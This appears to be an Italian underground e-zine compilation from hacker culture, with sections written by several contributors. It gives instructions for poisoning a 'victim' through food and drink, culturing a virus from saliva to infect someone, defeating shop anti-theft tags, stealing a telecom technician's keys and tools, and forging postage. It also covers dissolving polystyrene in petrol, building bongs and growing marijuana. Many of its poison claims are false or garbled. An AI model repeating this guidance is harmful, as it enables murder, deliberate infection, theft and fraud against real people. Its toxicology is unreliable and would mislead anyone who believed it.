Metti la polvere in un mortaio (da cucina, kosa credevate eh?),oppure
sostituiscilo in ogni tipo di kondimento..

Causa la morte in 3-4 ore...a volte anke più velocemente

Poison Oak/Ivy.
=-=-=-=-=-=-=-=
Prendi le foglie e procedi alla bollitura O bollisci le foglie e kuando
l'acqua diventa marroncino/verdognola mettila in una fialetta...aggiungi
kualke goccia alle bevande della vittima.

Tende a distruggere le corde vocali della vittima...

Rose Sistemiche.
=-=-=-=-=-=-=-=
Prendi un mazzo di Rose, inzuppa il terreno circostante kon un fertilizzante
molto velenoso.

Nei giorni seguenti, le foglie, le spine,etc diverranno altamente mortali..
Kuando la vittima verrà graffiata da kueste... Lui/Lei morirà

Veleni Parte 2
--------------
I secondi e più komuni veleni sono kuelli di metalli mortali ed estratti
terrosi

Arsienuro di Sodio.
=-=-=-=-=-=-=-=-
Kuesto insieme all'arsienuro del piombo sono nella top ten dei materiali +
letali. L' Arsienuro di Sodio può essere akuistato in un negozio di articoli
per la pulizia dei vetri...
Si mette nel cibo delle vittime, etc.

Cianuro di Potassio.
=-=-=-=-=-=-=-=-=-
Kuesto elemento kimiko è kontenuto nei semi della mela..
Per averlo devi macinare circa 12 once di semi della mela.
L'effetto è vicino all'avvelenamento da radiazioni....
Uccide in 6 ore.

Curaro.
=-=-=-=
Kuesta sostanza è non basilarmente unveleno..SOno varie droghe-veleni
kombinati insieme e dati in una dose letale.Uccide nel giro di 45 min..

Piombo.
=-=-=
Anche se kuesto materiale è molto komune allo steso tempo è altamente mortale.
Prendi circa 30-40gr di polvere di Piombo e mettili nel cibo di kualkuno...

Mercurio.
=-=-=-=-
Il Mercurio è una sostanza mortale a kontatto kon la pelle.. Per usarlo molto
efficacemente, metti circa 20 grammi dovunkue la vittima possa appoggiare la
mano o altre parti del suo korpo. O mettilo nel suo cibo.


Plutonio.
=-=-=-=-=-
Questo materiale kome il merkurio, è <ALTAMENTE> mortale ...Causa il cancro
anke nel più pikkolo dosaggio
Se la vittima è ad esso esposta morirà ne giro di una settimana di
avvelenamento da radiazioni....

Altri (skonosciuti)
=-=-=-=-=-=-=-=-=
Certamente è impossibile fare una lista di tutte le sostanze letali in kuesto
testo. Ma vi farò vedere kome fare dei veleni kombinati:
(credit to Ima Hacker)

prendi tre strisce moschicida (tm)
mettile in un recipiente kon della trementina per tutta la notte.
La mattina prendi kuel gel bianko/marrone ke si trova lì vicino.
Uccide in 60 secondi.. Contali!
(credit to Ima Hacker)

[ m4l3f1k0 ] traduzione

.------------------------------------------------------------[ aNarcHy ]-----.
| I VIRUS BIOLOGICI |
*------------------------------[ GourangA ]--[gouranga_phreak@hotmail.com ]--*


Dedicato ad una mia amica che ha 4 in biologia.

Qua insegno come coltivare un VIRUS (non per pc) per farne l'uso che piu'
credete saggio e, magari, contagiare qualcuno:

Occorrente:

Contenitore cilindrico altezza 5 millimetri di vetro
Gelatina per dolci (se possibile quella usata per conservare i tessuti in
ospedale)
Una siringa
Il virus

In media non si ha sempre l'occasione di contagiare qualcuno che ti sta sul
cazzo con il virus ebola.

Esempio: voi vi ammalate del virus dell'inflUenza (non sottovalutatelo,
provoca piu' morti l'influenza che marburg ed ebola assieme) e volete
"cons

  
ervarlo" per contaggiare qualcuno in un secondo momento, allora appena
starnutite prendete campioni di saliva e muco.

Cosa fare con questi campioni, sicuramente se servite un bel pranzetto alla
vittima con questi due componenti lo rifiutera', e non e' cosi' facile far
incubare un virus all'interno di un organismo.

Allora, prendete il cilindretto di vetro, e inseriteci sopra la gelatina,
aspettate che la gelatina si rafreddi a temperatura 0 gradi e inseriteci sopra
il campione di saliva infetta (in minima parte, sangue infetto "prende" piu'
facilmente).

Il liquido infetto da inserire sulla gelatina deve essere una minima parte,
esempio una goccia, quindi aiutatevi con una siringa, poggiate la goccia al
centro del contenitore.

Ora chiudete il contenitore con carta trasparente (quella che si usa per i
cibi) e conservatelo come gia'detto in luogo asciutto e in mancanza di aria.
Il virus e' un esserino, anche se infinitamente piccolo, infinitamente
resistente, si riproduce creando copie perfette di se stesso, tramite il dna,
in pochissimo tempo le copie diventano milioni.Pensate che i virus riescono a
sopravvivere a pressione 0, alla mancanza di ossigeno e a temperature
altissime o bassissime e in qualsiasi stato di agregazione dell'ambiente
(solido liquido aeriforme).

Dopo qualche giorno, vedrete sulla gelatina se tutto e' andato bene delle
strane macchie, quello e' il virus che si sta riproducendo. Quando secondo
voi il virus e' pronto bisogna servirlo alla vittima.

Ma come fare?

Immergete la gelatina in un liquido organico (acqua animore) e conservate a
temperatura 5° Celsius per qualche giorno (consiglio glucosio liquido, in
farmacia). Se la procedura ha funzionato il virus si e' riprodotto, prima
nella gelatina, e poi nel liquido.

Istruzioni d'uso:

Prendere il liquido e darlo da bere alla vittima, condirgli il mangiare, o
comunque farglielo ingoiare.Ha piu' effetto se si inietta alla vittima,
magari in una soluzione di glucosio. Ogni effetto collaterale.
Sconsigliato per i bambini al di sotto dei 12 anni e alle belle tipe (che le
seconde devono vivere a lungo ed incontrarmi).

Spiegazione:

Il virus non e' morto, al contrario, si e' riprodotto. Quando la vittima ha
contatto orale col virus il virus si riproduce anche sul suo organismo.

Attenzione:

Il virus e' un essere vivente, non contaggiate merde che non ne sono degne.
Una persona puo' anche morire per via di un virus (dipende dall'intensita'
del contaggio e dal tipo di virus), ma anche se muore, non siete stati voi ad
ucciderla ma il virus (coscenza pulita, apposto con la legge). Il marburg e'
un virus molto diffuso in Nord Europa, come l'antracia e simili, facilmente
reperibili su animali di grossa taglia come vacche, e letali per l'uomo.Se
volete provocare un epidemia di ebola andate in kongo (attuale Zaire) a
vostro rischio e pericolo.

Musica ascoltata durante l'articolo:
Marilyn Manson, Holy Wood (quasi tutte)
George Baker Selection, Little green bag (colonna sonora del film di Quentin
Tarantino "Le Iene")
Soulfly, Jump Da Fuck Up

Mangiare ingerito:
Uova (cucinate da me in svariati modi).

[ Gouranga ]



.-----------------------------------------------------------[ ScaMmIng ]-----.
| COME BLOCCARE GLI ALLARMI CHE IN MEDIA SI METTONO SUI VESTITI |
*------------------------------[ GourangA ]--[gouranga_phreak@hotmail.com ]--*

Allora, ora faro' il disegno dell'allarme, il tipo di allarmi che in genere
vengono applicati nei grandi negozi di abbigliamento....
Ho una madre che lavora in un negozzio di abbigliamento, e usa questi allarmi,
cosi' ho avuto l'occasione di testarli:

n.B. Vista laterale del " dischetto "

0000
0000
@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@


n.B. Vista frontale del " dischetto "

@@@@@@@@@@@
@@@@@0000@@
@@@@@0000@@@@@
@@@@@@@@@@@@@@ <-------antitaccheggio
@@@@@@@@@@@@@@
@@@@@@@@@@@@@@
@@@@@@@@@@@@@@



E ora i dispositivi che in media sono all'entrata:

|| ||
%% %% <---------- Li ho fatti male, comunque
%% %% questi sono quelli che in
%% %% media sono all'entrata, che
%% %% fanno suonare l'allarme.
%% %%
%% %%
%% %%
000 000
000 000
000 000


NOTE: Io ho un Ericsson GF768, ho provato piu' volte, ed ha sempre
funzionato.
Una batteria carica e' essenziale perche' la cosa sia fattibile.
Ho provato anche con un Nokia di un amico, un 7110, ha funzionato
ugualmente.


PROCEDIMENTO:

Di modi ce ne sono molti, anche coprire di stagnola l'antitakkeggio funziona,
ma non sempre, consiglio il metodo sotto elencato per maggiore sicurezza.

Prendere il cellulare, e posizionarlo sulla cosa sporgente dell'antitac-
cheggio. Tenere molto premuto, in modo che la batteria del cellulare tocchi
sia la cosa sporgente sia la base del "dischetto"

Allora, procediamo con l'ascii :


#########
######### <------------batteria cellulare, con
######### 0000 cellulare attaccato!!!
######### 0000 <------------coso sporgente su
@@@@@@@@@@@@@@@@@ antitaccheggio.
@@@@@@@@@@@@@@@@@ <------------antitaccheggio.


Allora, l'antitaccheggio, se aperto, ha una spirale ramata, il fil di rame e'
ricoperto da una plastica molto sottile che parte dal coso sporgente, a cui
si collega un dispositivo; una volta che si passa all'interno di quelle specie
di "porte" all'entrata, passa un'onda magnetica, che se respinta dal
dispositivo suona (o simile, io lo ho analizzato molto bene),piazzando la
batteria su due punti essenziali che ora vi mostro:


°°
°°
°° °°
°° °°
°° °°
°° °°
°° \/
°° 0000
\/ 0000
@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@


SPIEGAZIOnE:

Allora, la batteria manda onde magnetiche, mandandole, fa fare qualcosa al
filo ramato(credo non gli faccia fare contatto) oppure non gli fa inviare
onde, o assorbe tutte le onde (probabilmente).
In poche parole bisogna tenere la batteria perfettamente centrata, cioe', in
modo che i millimetri alla destra del coso e quelli alla sinistra (sempre del
coso) corrispondano, e che tocchi a poco piu' dall'inizio il coso sporgente
e a poco dalla fine la parte che ho indicato.
Se non avete capito, siete propio deficienti se andate nei casini, e' solo
colpa vostra.


Questo è un metodo testato piu' e piu' volte, che logicamente ho usato piu'
di una volta (ehehhehehe); l'ho insegnato ad un amico, ed anche lui lo sa
usare benissimo, se potete, provate, piu' volte, dovete esserne certi prima
di mettere in pratica, magari chiedete ad un amico, o a vostra madre, o a
vostra sorella, se vi fa provare quel metodo, dopo potrete andare anche su
grandi centri commerciali, se qualcosa non funziona ovviamente no!

[ GourangA ]


.-----------------------------------------------------------[ ScaMmIng ]-----.
| SCAMMING DI MATERIALE TELEFONICO |
*--------------------------------------[ PHCV ]--[phcv_master@hotmail.com ]--*

Come ottenere materiale telefonico ...free...

Legal Disclaimer:
Queste informazioni sono solo ad uso didattico; se facendo queste cose vi
beccano sono cazzi vostri...
Il sottoscritto non centra una cazzo! Vi potrebbero incolpare di furto e se
poi accertano che la causa del danno qui descritto è vostra siete voi nella
merda e NON io!!Detto questo si può procedere.


Un metodo molto efficace X fregare un po' di roba alla nostra beneamata
Telecozz è questo:
In molti condomini sono presenti nel sottoscala o nel locale contatori le
scatole di derivazione telecozz. L'azione viene meglio se queste scaole
collegano, come nel mio caso, circa 150 linee telefoniche.
Ora con una semplice beige box (ne avrete pure una, vero?) cercate un
morsetto su cui non sia presente la linea telefonica e collegateci su il
vostro cavo che avrete precedentemente individuato. Di conseguenza il vostro
telefono sarà muto, e lo scambio di cavi non si noterà nemmeno.
Adesso chiamate il 187 della telecozz da un cello, tanto è gratis, e
segnalate il vostro "guasto" (se così si può definire...).
Entro 2 ore vi arriva l'omino telecazz con la sua bella valigia piena di
strumenti, chiavi, schemi e la appoggia dentro casa vostra. Lui intanto sta
cercando il guasto e non si accorege che voi riuscite a fregare roba dalla
sua cassetta. La aprite e prendete schemi, chiavi di cabine, chiavi di
centraline, tester...
Dopo un casino di tempo lui riesce ad accertare il guasto e lo ripara, ma
intanto voi avete già fatto e fregato un casino di cose.
Vi assicuro che il metodo funziona; l'ho già sperimentato due volte ed
entrambe le volte ho fregato qualcosa; a proposito: allego la foto di una
chiave che ho fregato ma che non riesco a capire a cosa serva... se lo
sapete...tnx!
Attenzione a non esagerare con questo metodo, però!! La telecazz logga tutte
le chiamate al 187 che fate; si accorge subito di questi trucchi!
Usatelo al massimo 1 volta ogni 2 anni!

phcv_master@hotmail.com

[ PHCV ]

.-----------------------------------------------------------[ ScaMmIng ]-----.
| CARTOLINE E LETTERE GRATIS? BASTA UNA STAMPANTE! |
*--------------------------------------[ mR_bIs0n ]--[chiappe666@libero.it]--*

L'importante Š non possedere la stampante usata da Gutemberg!!! Quella kol
torkio!!!Ihihihihiihh!!!

Autore: mR_bIs0n
Musica ascoltata: niente mp3, causa tasto accensione rotto!
Consumo: aspe'ke kiedo qualkosa da mangiare a mia madre:
Io: MAAAAAAAAAA, ke c'Š qualkosa da mangiare???
Mamma: AAAAAH! Non c'Š nulla da mangiare! ESCI DAL COMPUTER!!! AAAH!
Bene kredo ke abbiate kapito...
Abbigliamento: classiko stile mR_bIs0nesko, jeans, T-Shirt sportiva sotto
kamicia aperta...
Saluti: innanzitutto a Oldy, il mitiko... poi i miei amici di skuola, Davide
Panino e Giorgio Qulo, Mr_Skull, Bibo e Carmine, gli amici di IRC,
/z0KA/ aka brother//, lo scomparso Pankrazio e tutti i miei
ammiratori!!!
Fankulo a: Ceino Pompino, Giuseppe Pasanisi e Fabio Fanizza...

<---Il problema--->
Ed ekkoci! E'passata l'estate e dopo ke vi siete skopati (spero per voi) una
quindicina di ragazze di altre parti, volete mandare a tutte una kartolina
per rikordare le calde passioni... Ma vi rendete konto di dover spedire molte
cartoline o lettere e pagare salato di conseguenza... Oki no problem,
aggiusta tutto zio bIs0n, ke in kampo di skamming non fa mai cilekka!

<---L'intuizione--->
Un bel giorno, avendo in mano una cartolina di abbonamento a Focus, nota
rivista scientifica, mi domando: "Qual Š il numero di Asia Argento?
E'possibile telefonarle? Se si perkŠ?"... Anzi no!: "Pu• esistere il formaggio
dopobarba?"... no!: "E'possibile usare il tagliando ke c'Š sulle kartoline di
abbonamento per non pagare le cartoline proprie?". Da quel giorno mi misi a
lavorare, e dopo tanto tempo (5 min pressappoko kompresa la stampa), sono
riuscito, kol mio prode Corel Draw 9, a fare una cartolina in tutto e per
tutto identika a quelle usate per le cartoline di abbonamento, solo kol
destinatario personalizzabile.

<---Kome Š fatta???--->
La cartolina rettangolare ha tre parti fondamentali:
- il tagliandino sull'affrankatura;
- alcune lineette sul lato destro
(ke ankora ignoro a kosa servono...);
- dicitura col destinatario.
Tutto vi sar… pi— semplice vedendo l'immagine jpg contenuta nel file zip
"sborra.zip"... ah, non volevano ke lo kiamassi kos, gi…... "mR_bIs0n.zip"!

<---Kosa succede, sekondo la tua modesta teoria senza senso???--->
Inxomma, tenter• di abbozzare qualkosa... Secondo me, l'ufficio postale,
poterbbe notare il fatto ke Š una cartolina col il tagliando di affrankatura
"gratuita", addebbitando la spesa postale sulla povera kasa editrice (povera,
poi..) ke possiede il conto di kredito portato sul tagliandino...
Forse le lineette sul fianko destro, dovrebbero servire kome una specie di
"codice"... forse quel kodice, identifika il conto corrente su kui skarikare
la spesa...

<---Dacci dei consigli!!!--->
Se non volete utilizzare la mia kopia presente nel file zip, potete sempre
farvene di vostre, ma attenzione! Usate pi— konti korrenti, quindi cerkate
quante pi— cartoline o lettere di abbonamento... Le lineette sul fianko
imitatele nella loro frequenza e grandezza (es. grandezza: 3mm frequenza: ogni
2.5mm...).

<---Manka ankora qualkosa...--->
Si, infatti ci sarebbero delle altre prove ke Š possibile fare:
innanzitutto fare altre prove di spedizione:
- io mi sono mandato una lettera formale, bisogna vedere se accettano anke
letere informali e magari skurrili,
- potrebbe essere possibile mandare anke delle lettere e magari anke dei pakki
postali... il fatto sta ke per i pakki bisogna ke ci sia anke il nome del
mittente...

<---Tutti ci skommettiamo ke ora ti masturberai--->
Kome avete fatto ad indovinare??? Bha...

Un megasalutone dal vostro amiko

[ mR_bIs0n ]

.-----------------------------------------------------------[ ScaMmIng ]-----.
| SKAM'n'TRASH ! UTILI CONSIGLI PER.... |
*--------------------------------------------[ HK_S_1 ]--[hks1@voyanet.org]--*

Avete finalmente deciso di buttare tutte le cianfrusaglie che stanno a
casa vostra e riempirla di nuove stronzate?

FERMI!TRASHING!

ricordate che :

- dalle lattine in metallo si ricavano degli splendidi portacenere.

- i jeans vecchi usati(e magari strappati) diventano delle bellissime
borse a tracolla.basta utilizzare la fascia dei passanti come tracolla
e per la borsa guardate questo schema.

/--------\
|////////|
|////////|
|////////|
|________|
/_______/| <--- e' la parte posteriore
| _____ || di una gamba dei jeans.
| | | || <--- qui infatti c'e' la tasca.
ai lati vanno fatte | \_/ ||
fatte delle cuciture-->| ||<--ai lati vanno fatte delle cuciture
| ||
|_______|/ <--- questo e' il risvolto.


- non buttate i floppy danneggiati! ho scoperto che con la parte
metallica si possono costruire degli indistruttibili filtri per chi fuma
tabacco in busta.verrebbe qualcosa del genere:

/-\-------------\
| @ | )
\-/-------------/

- i cestelli delle lavatrici guaste sono degli scheletri per costruire
i "puff" , ovvero quegli strani sgabbelli tondi senza gambe imbottiti
di gommapiuma. (grazie nonnina :* )


- i cd graffiati inutilizzabili possono essere piegati ai lati , dando
vita a dei coloratissimi portacenere(ovviamente dopo aver tappato il
buco centrale con qualcosa).

- le schede di vecchi computers non funzionanti decorano le pareti che
forse non avete mai avuto la possibilita' di intonacare.Ancora meglio
se le accostate una vicina all'altra e collegate a casaccio con del filo
elettrico colorato.

- i monitor a fosfori verdi bruciati possono essere forati da dietro in
modo che un faretto illumini l'interno e i caratteri impressionati
sullo schermo riacquistino vita!al buio da un effetto da paura! :)

- avete degli orologi grandi a lancette con la meccanica guasta?non
buttateli! fate cosi': togliete la meccanica , fissate un'asticella
perpendicolare al quandro dei numeri. orientate il "12" verso nord e
il sole(se c'e') vi proiettera' l'ombra dell'asticella sul quadro dandovi
l'ora solare.quando e' in vigore l'ora legale , bastera' orientare
l'orologio in modo che fornisca l'orario giusto :) E' molto bello ve
lo assicuro!

- Avete un'automobile totalmente distrutta e non sapete che
farne? togliete i sedili e usateli come poltrone.se sono anche
regolabili , sara' un lusso avere delle poltrone a casa che si
abbassano ed si alzano a vostro piacimento! ;)

- Avete una enorme quantita' di polistirolo da buttare?non
buttatelo!potrebbe inquinare l'ambiente!prendete una vaschetta con due
dita di benzina e immergetelo li'.Vi assicuro che il tutto si
sciogliera' lasciando nella vaschetta solo qualche alone bianco.cosi'
eviterete di portarvi dietro tutto quel polistirolo e se sotterate il
tutto ben siggillato farete meno male alla natura.ATTENZIONE!la
sostanza biancastra e' un potente incendiario irritante per la pelle!!!
state attenti , ma salvate la natura!!!


Con questi piccoli consigli riuscirete ad ottenere della roba nuova a
costo zero, buttare meno roba vecchia e quindi non contribuire
all'inquinamento!

byez

HK_S_1 <hks1@voyanet.org> * FreakNet MediaLab

Tutti i diritti secondo GNU/GPL

[ HK_S_1 ]



.-------------------------------------------------------------[ nArCo$ ]-----.
| BONK e NARGHILE MOLTO ECONOMICI |
*----------------------------------[ Ra104 ]--[mago_pancione@lycosmail.com]--*


Thanks to: Lascar,Piskio,Dax,Mark e il mitiko "vecchietto"

Per costruire una pipa ad acqua economica(molto economica) ci servono:

2 bicchieri di plastica
una penna bic
un po' di colla
e soprattutto qualcosa da fumare(scegliete voi: tabacco, aromi per pollo,
origano...)

Prendete un bicchiere e fate un buco grande quanto la bic(se volete fare il
buco in modo perfetto usate una sigaretta accesa) a tre quarti del bicchiere,
svuotate la parte trasparente della penna e infilatela nel buco in modo che
la parte piccola entra nel bicchiere e vada verso il basso; incollate BENE la
penna nel bicchiere. Versate un po' d'acqua nel bicchiere in modo che la
cannuccia della penna peschi nell'acqua. Fare un buco piccolo in un'angolo
del secondo bicchiere e incollate i bordi dei 2 bicchieri.

Ora provate ad tirare un po' di aria dal foro in alto se sentite rumore di
bolle la vostra pipa ad acqua funziona se no dovete sigillare meglio con la
colla. Ora rollate una sigaretta con un filtrino poco + piccolo del diametro
della bic, inseritelo nella bic e accendete.

L'aria,forse è meglio dire il fumo, passa prima nell'acqua e quindi si
raffredda.

_________ foro
|
| |
| |
bic \\ | |secondo bicchiere
\\ | |
\\ 8---------8
\\| |
\\ |
\\~~~~~~~~|
|\\ acqua |
| \\ |primo bicchiere
|_________|





Poi per costruire un narghile(o qualcosa che gli assomiglia molto) dovete:

Prendere una bottiglia di plastica.
Praticare due fori nella parte subito sotto il collo e inserire due tubi di
plastica flessibili siggilandoli con del silicone.

Prendere un tappo di sughero e forarlo nel centro. Fare passare per il foro
del tappo di sughero un tubo abbastanza lungo. Inserrte nella parte superiore
del tubo un bracerino di alluminio. Versare all'interno della bottiglia
dell'acqua fresca assicurandovi che il livello sia sufficentemente alto.
Inserire il tappo sul collo assicurando che la parte inferiore del tubo sia
immersa nell'acqua.Versare la mistura all'interno del bracere, accendete e
tirate dai tubi.

Icq: 38695477

[ Ra104 ]

.-------------------------------------------------------------[ nArCo$ ]-----.
| IL METODO "QUEPACK" |
*------------------------------------------[ Quequero ]--[UIC@mail.usa.com]--*


-== How To Grow Your Own ==-
Educational Tutorial
Written by -=Quequero=-

Salve a tutti, vi presento un allegro tutorial su come coltivare la gloriosa
pianta della Marijuana. Lo so che di tute ne sono stati fatti a iosa, ma
questo sarà assolutamente unico perchè vi presenterò una tecnica invetata da
me (o quantomeno non l'ho sentita da nessuna parte) e soprattutto non vi darò
rigide dosi di prodotti da usare a tale giorni a tale ore...Coltiverete il
tutto sul vostro balcone (come me) nella massima libertà e con i più felici
risultati.
Ma iniziamo....

-== I semi ==-

I semi sono forse l'unica cosa "difficile" da reperire, per prima cosa
comperate un po' di erba e sicuramente ce ne troverete dentro qualcuno, vi do
un paio di consigli:
Il seme NON deve essere bianco bensì scuro
Schiacciateli tra l'indice ed il pollice con un po' di pressione, se
resistono allora sono buoni.
Ecco tutto, ricordatevi solo questi due consigli.

-== La germinazione ==-

Anche qui niente di problematico, avete due soluzioni, la prima consiste nel
prendere un bicchiere, sul fondo stendete uno strato di cotone per
medicazioni, sopra ci appoggiate i semi che coprirete con un altro strato di
cotone e poi vi preoccuperete di impregnare il tutto ben bene con dell'acqua.
È importantissimo, in questa fase, esporre i semi alla luce perchè il seme è
come un batterio congelato, se non viene stimolato non riprenderà mai a
vivere. Se per qualche motivo non potete metterlo al sole perchè è ancora
freddo o nuvoloso, allora mettete il seme sul termosifone (purchè non si
trovi a 70°C) e puntate sul bicchiere, per qualche ora al giorno, una
lampadina normalissima.

La seconda soluzione consiste nel prendere un panno di cotone (una maglietta
bianca ad esempio), stenderla e poggiarci sopra i semini per poi arrotolare
il panno, l'unico difetto di questa soluzione è che una volta germinato, il
seme resterà intrappolato nel cotone e voi dovrete farvi il mazzo per
cacciare le radici, lo so che potreste tragliare il cotone vicino alle radici
ma poi resterebbe un "collare" che impedirebbe alla pianta di crescere.

Se c'è luce, il periodo è aprile-maggio (o se siete al sud va bene anche metà
marzo), allora in 5-10 giorni i vostri semini caccieranno delle graziose
radici...

Può sembrare stupido ma se i semini sono in compagnia germogliano meglio,
questo me lo insegnò mia nonna che mi disse: "I semini non crescono
perchè si sentono soli"...Sarà una credenza popolare, ma se ne mettete
in uno stesso bicchiere 7-8 nasceranno velocemente e meglio. Per
curiosità ho fatto una prova e devo dire che per qualche strano
motivo i semini che non erano soli sono nati più velocemente e meglio,
mentre i semini solitari o non hanno germogliato o sono morti poco dopo :(.

Questa è (per il coltivatore) la parte più difficile perchè passerete il
vostro tempo ad alzare il cotone ogni due ore per vedere se nasce
qualcosa.....Beh non fatelo o rischiate di far morire di "stress" i
semini, al massimo sollevate il cotone ogni due giorni e ricordate di
tenerlo ben bagnato.

-== Prima fase ==-

Dopo circa 10 giorni le vostre piantine saranno alte circa 4-5 cmq con due
foglioline rugose, beh, è arrivato il momento di trasferirle, se potete
mettetele in un vaso di 30-35 cm di diametro altrimenti dovrete fare diversi
travasi.
Andate dal fioraio e comprate:
1 vaso di taglia grande (uno per pianta logicamente)
5 Kg di terra per piante grasse (si si, quella per piante grasse è fantastica)
1 bottiglia di sangue di bue.
Con 14.000£ comprerete tutto il necessario per 6 piante (QueBonzo docet :).
Una sola cosa è importantissima.....Il sangue di bue, ora è fuori legge ma
al fioraio sotto banco e con un piccolo extra riuscirete e comperare una
bottiglia di questo preziossissimo elisir...Ah, il piccolo extra è di lire
1000...Così una bottiglia costa 2000£ :))
Se non lo trovare al fioraio andate al macellaio......Ma TROVATE il sangue di
bue, che non vi venga in mente di comperare fertilizzanti artificiali....
Rischiereste davvero grosso poi a fumare la vostra erba. Trovate il sangue di
bue (dite che è per il vostro luppolo) e se proprio non ci riuscite allora
dovrete ripiegare sul latte che è circa 10 volte meno "potente".
Tornate a casa e mettete nel vaso la vostra terra, con un cucchiaio
distruggetene per benino tutte le zolle e rendetela fine fine, il vaso deve
contenere molta molta terra quindi pressatela un pochetto. Lasciatela al sole
1 giorno per farla asciugare ed il giorno dopo staccate le piantine
delicatamente dal cotone e mettetele nella terra.

Piccolo consiglio: la parte interrata dello stelo sarà bianca perchè non
prende luce, bene, voi dovete interrare nel vaso la piantina fino a 1mm più
su bianco altrimenti il tronco marcirà.
Mi raccomando, non vi venisse in mente di cacciare fuori di casa le piante
ora, e soprattutto sorreggetele con degli stecchini, se la pianta si piega...
MUORE.
Ma datele più luce possibile ed annaffiatele con mezzo bicchiere d'acqua
appena vedete la terra asciutta (di solito ogni 5-6 gg)

-== QuePack ==-

Deh hi hi, ora il FANTASTICO metodo QuePack :), in cosa consiste?
Beh il coltivatore serio di Maria potrà spendere milioni di umidificatori,
corrente, neon per piante e soprattutto potrà coltivare la sua pianta
nell'armadio...Que non può fare tutto questo e soprattuto...Que NON ha soldi,
così si è dovuto inventare qualcosa....

Hihihihihihi, la pianta della maria nei primi stadi di crescita ha bisogno di
umidità pressochè costante e calde temperature. Io non ho soldi per un
umidificatore, non ho un armadio da adibire a giardino e soprattutto vivo in
un luogo decisamente freddo e cosa fare in questi casi?
Semplicissimo: appena le vostre piante avranno 20 giorni DOVRETE trasferirle
in un vaso più grande se prima stavano in uno piccolo, altrimenti potrete
lasciarle lì....Ma dovrete cacciarle fuori di casa e dargli del buon caldo
sole.
C'è un problema: il vento, l'umidità ecc....Come ovviare?
Beh, prendete dei sacchetti grandi di DomoPack (trasparenti mi raccomando) e
coprite le piantine come con un preservativo gigante e fate arrivare il
DomoPack fino alla base del vaso, una buona cosa sarebbe inserire 3 o più
stecche di legno nel vaso che in modo che possano tenere alto il DomoPack
senza farlo venire a contatto con le piante.
Bene, ora dovete praticare due fori di 4cm di diametro sui lati del DomoPack
in direzione parallela al vento, mi spiego:

/-------\
/ \
----> VENTO ----> O VASO O ----> VENTO -----> VENTO
\ /
\-------/

Questo è il vaso visto dall'alto, i buchi sono paralleli alla corrente.
Perchè ciò? Perchè questa è una mini-serra davvero funzionale, in quanto si
preoccupa di mantenere la pianta ad una temperatura OTTIMALE di circa
30-34 °C (e non è roba da poco), oltretutto mantiene alta l'umidità (80%)
senza rendere l'aria satura grazie alla presenza dei buchi.

Abbiate l'accortezza di tenere le piante al sole almeno 8 ore ed
ogni giorno rotatele di 180°, sempre mantenendo i buchi nella direzione
giusta.
Per sapere se i buchi sono della giusta dimensione non dovrete fare altro che
guardare la busta, se si da della condensa allora sono troppo piccoli, se
infilate un dito nella serretta e vedete che la temperatura interna è uguale
a quella esterna, allora sono troppo grandi, empirico come ragionamente ma
molto molto funzionale.

A questo stadio della crescita date acqua a volontà ogni 5 giorni, secondo me
non è vero che bisogna tenerle a stecchetta, appena vedete la terra quasi
arida le date acqua, le dosi variano a seconda del vaso ma cmq trattatela
come una pianta normale e non avrete rogna. Ovviamente innaffiate le piante
di notte o cmq SEMPRE dopo il tramonto altrimenti moriranno.
Datele un cucchiaino di latte ogni 10gg ovviamente disciolto in acqua, il
sangue di bue è troppo forte per ora (ve lo dico perchè ho perso 3 piantine).
L'ideale inoltre sarebbe quello di illuminarle 16-18 ore al giorno, ma la
corrente costa cara, così 8 ore di sole le faranno crescere benissimo

-== Terza fase ==-

Dopo circa un mese le piante saranno alte circa 20-25cm appena raggiunta
questa altezza (non prima) potrete togliere il QuePack dai vasi a lasciarle
allo scoperto, il vento difficilmente le danneggierà, ma di certo se è forte
le dovrete mettere sotto un tavolo o in casa. Se inizia a piovere togliete le
piante da sotto l'acqua perchè anche pochi minuti saranno sufficienti a
dissolvere TUTTA la resina prodotta finora....E si sa che la resina è 8 volte
più forte delle foglie.
Se dovete partire per le vacanze non preoccupatevi, mettete una bottiglia
ribaltata piena d'acqua sui vasi, ma se l'avrete piantate a marzo-maggio non
fatevi problemi perchè resisteranno alla siccità (ovvio che una bottiglia
darà una mano), e non tenetele sul balcone ma mettetele sotto un tavolo o in
casa, anche se non prenderanno sole diretto per 15gg non staranno
assolutamente male, ma anzi si rilaserrano dallo stress provocato dai cambi
di temperatura e prenderanno tempo per infoltirsi. Per 15gg non c'è problema
ma se diventano oltre 20 allora preoccupatevi di farle innaffiare almeno una
volta.

La fertilizzazione è semplicissima: ogni 8 giorni (alternativamente) darete
ad ogni pianta 2 cucchiaini di latte e mezzo tappo (si, si misura in tappi)
di sangue di bue per litro d'acqua.
Fino ad ora avete utilizzato soltanto latte, appena tolto il QuePack iniziate
con il sangue di bue, poi dopo 8 giorni passerete al latte e dopo ancora al
sangue....e così via, questo procedimento lo dovrete ripetere "ad libitum"...
E le piantine cresceranno con tanta rapidità, se le foglie si arricciano
avete usato troppo fertilizzante e l'unico metodo per salvarle è innaffiarle
spesso ed abbondantemente con cherosene.....Scherzo, dovrete usare acqua pura.

Le piante nel frattempo cresceranno in 15gg di oltre 20cm e le foglie che si
seccano potrete anche fumarle che sono ottime, ma non ne strappate nessuno
altrimenti la pianta per difendersi ne farà crescere in modo disordinato
molte che resteranno piccole e la piantina morirà per squilibrio idrodinamico,
quindi resistete ancora un po'...resistete è molto relativo visto che nel
frattempo avrete già ricavato più di 200.000lire di foglie morte che sono
ottimissime :))) diciamo che la pianta mediamente perde 2-3 foglie al giorno
:) ecco fatto.

-== Quarta fase ==-

La pianta sarà ora alta oltre 40cm ed inizierete a capire se è maschio o
femmina, lo so che il Piè sarà ora contrario, ma vi garantisco una cosa:
a questo stato della crescita la pianta maschio è di un verde molto scuro,
mentre la femmina è molto brillante, ad ogni modo la pianta maschio riuscirete
a riconoscerla gia quando sarà alta 30cm per il semplice fatto che mentre le
femmine fanno i fiori sulle cime dei loro rami i maschi invece creano degli
appositi "steli" che salgono verso l'alto e fanno dei boccioli.

Tenete presente a parità di età ecco le differenze che avrete tra le due
piante:

_____________________________________________________________________________
Maschio | Femmina |
____________________________|________________________________________________|
- Colore verde molto scuro | - Colore verde brillante |
- Esile, tronco fino | - Tronco forte e spesso |
- Foglie esili | - Foglie molto carnose |
- Poco folta | - Molto folta (cmq più folta del maschio) |
- Dei rami nudi si alzano | |
verso l'alto | - Non troverete rami nudi |
